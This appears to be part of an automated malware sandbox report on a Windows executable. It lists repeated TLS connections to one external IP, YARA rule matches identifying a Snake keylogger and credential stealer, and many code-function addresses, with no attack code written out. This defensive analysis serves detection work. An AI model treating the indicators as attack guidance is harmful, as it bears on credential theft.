                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50064 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50065 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50066 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50067 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50068 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50069 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50070 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50071 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50072 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50073 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50074 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50075 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50076 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50077 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50079 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50080 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50081 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50082 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50084 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50085 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50086 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50087 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50088 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50089 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50090 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50091 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50092 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50094 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50095 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50096 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50097 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50098 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50099 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50100 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50101 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50102 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50103 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50104 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50105 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50106 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50107 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50108 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50109 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50110 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50111 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50112 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50113 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50114 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50115 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50116 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50117 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50118 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50119 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50120 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50121 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50122 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50123 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50124 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50125 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50126 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50127 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50128 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50129 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50130 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50131 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50132 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50133 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50134 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50135 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50136 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50137 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50138 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50139 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50140 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50141 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50142 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50143 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50144 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50145 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50146 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50147 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50148 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50149 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50150 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50151 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50152 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50153 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50154 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50155 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50156 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50157 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50158 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50159 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50161 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50162 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50164 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50165 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50167 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50169 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50171 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50173 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50175 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50177 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50179 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50181 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50183 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50185 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50187 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50189 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50191 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50193 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50195 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50197 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50199 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50201 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50203 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50205 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50207 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50209 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50211 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50213 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50215 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50217 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50219 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50221 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50223 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50225 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50227 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50229 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50231 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50233 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50235 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50237 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50239 version: TLS 1.2
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Yef4EqsQha.exe PID: 7872, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_01123E340_2_01123E34
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_0112E1240_2_0112E124
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_01126F900_2_01126F90
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_077F92200_2_077F9220
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_077F00400_2_077F0040
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_077F2FC00_2_077F2FC0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_077F4ED80_2_077F4ED8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_077F2B480_2_077F2B48
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_077F2B120_2_077F2B12
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_077F33F80_2_077F33F8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_077F2B880_2_077F2B88
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_077F4AA00_2_077F4AA0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_077F482F0_2_077F482F
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_077F00070_2_077F0007
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_08C541170_2_08C54117
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_08C512400_2_08C51240
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_08C536680_2_08C53668
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_08C56D080_2_08C56D08
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 0_2_08C512300_2_08C51230
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DFC1466_2_00DFC146
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DFD2786_2_00DFD278
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF53626_2_00DF5362
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DFC7386_2_00DFC738
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DFE9886_2_00DFE988
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF69A06_2_00DF69A0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DFCA086_2_00DFCA08
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DFCCD86_2_00DFCCD8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF9DE06_2_00DF9DE0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF3E096_2_00DF3E09
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF6FC86_2_00DF6FC8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DFCFA96_2_00DFCFA9
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF39ED6_2_00DF39ED
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF29EC6_2_00DF29EC
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DFF98C6_2_00DFF98C
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DFE97A6_2_00DFE97A
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF3AA16_2_00DF3AA1
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A81D06_2_054A81D0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A7B786_2_054A7B78
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A8FB06_2_054A8FB0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A0D486_2_054A0D48
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AE5486_2_054AE548
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AC5486_2_054AC548
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AC5586_2_054AC558
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AA9286_2_054AA928
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AA9386_2_054AA938
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AE9D86_2_054AE9D8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AC9E86_2_054AC9E8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A15F86_2_054A15F8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A15F76_2_054A15F7
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A119F6_2_054A119F
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A11A06_2_054A11A0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A00406_2_054A0040
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A345F6_2_054A345F
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A34606_2_054A3460
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A30086_2_054A3008
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A30076_2_054A3007
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AFC186_2_054AFC18
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054ADC196_2_054ADC19
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054ABC2A6_2_054ABC2A
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054ADC286_2_054ADC28
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054ABC386_2_054ABC38
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A60306_2_054A6030
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AC0C86_2_054AC0C8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A80C86_2_054A80C8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A08F06_2_054A08F0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A64886_2_054A6488
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A04986_2_054A0498
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AE0A76_2_054AE0A7
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A38B86_2_054A38B8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AE0B86_2_054AE0B8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AC0B76_2_054AC0B7
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A27586_2_054A2758
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A27576_2_054A2757
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A7B776_2_054A7B77
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AD3086_2_054AD308
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A23006_2_054A2300
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AB3076_2_054AB307
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AB3186_2_054AB318
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A53286_2_054A5328
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A77226_2_054A7722
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A77206_2_054A7720
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A5BD86_2_054A5BD8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AF7886_2_054AF788
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A57806_2_054A5780
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AD7876_2_054AD787
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AD7986_2_054AD798
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AB7986_2_054AB798
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AB7A86_2_054AB7A8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A2BAF6_2_054A2BAF
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A8FA16_2_054A8FA1
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A2BB06_2_054A2BB0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A1A4F6_2_054A1A4F
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A1A506_2_054A1A50
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AEE686_2_054AEE68
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054ACE676_2_054ACE67
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A4A786_2_054A4A78
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054ACE786_2_054ACE78
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A6E726_2_054A6E72
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A6E706_2_054A6E70
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A6A186_2_054A6A18
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A46226_2_054A4622
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A46206_2_054A4620
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A72CA6_2_054A72CA
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A72C86_2_054A72C8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A4ED06_2_054A4ED0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AF2E76_2_054AF2E7
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AF2F86_2_054AF2F8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A22FF6_2_054A22FF
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054AD2F76_2_054AD2F7
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A1EA86_2_054A1EA8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_054A1EA76_2_054A1EA7
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Yef4EqsQha.exe
                    Source: Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Yef4EqsQha.exe
